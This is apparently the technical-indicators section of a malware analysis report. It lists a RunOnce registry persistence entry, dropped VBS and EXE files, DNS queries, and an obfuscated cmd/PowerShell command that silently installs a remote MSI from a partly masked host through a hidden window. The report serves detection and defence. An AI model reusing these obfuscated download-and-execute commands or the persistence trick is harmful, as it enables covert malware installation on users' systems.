Technical Information
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\RunOnce] 'JORDSKAELV' = '%TEMP%\spurven\Hannerne9.vbs'
- '<SYSTEM32>\cmd.exe' /c powershell m%ProgramW6432:~15%iexec.exe /q%CommonProgramFiles(x86):~-25,1%/%windir:~-6,1% http://fa#1.ru/far.msi
- hannerne9.exe
- %TEMP%\spurven\hannerne9.exe
- %TEMP%\spurven\hannerne9.vbs
- http://fa#1.ru/far.msi
- http://we####thisbar.us/Host_doxJdsggH87.bin
- DNS ASK fa#1.ru
- DNS ASK we####thisbar.us
- '%WINDIR%\installer\msi3d43.tmp'
- '%TEMP%\spurven\hannerne9.exe'
- '<SYSTEM32>\cmd.exe' /c powershell m%ProgramW6432:~15%iexec.exe /q%CommonProgramFiles(x86):~-25,1%/%windir:~-6,1% http://fa#1.ru/far.msi' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' msiexec.exe /q /i http://fa#1.ru/far.msi
- '<SYSTEM32>\msiexec.exe' /q /i http://fa#1.ru/far.msi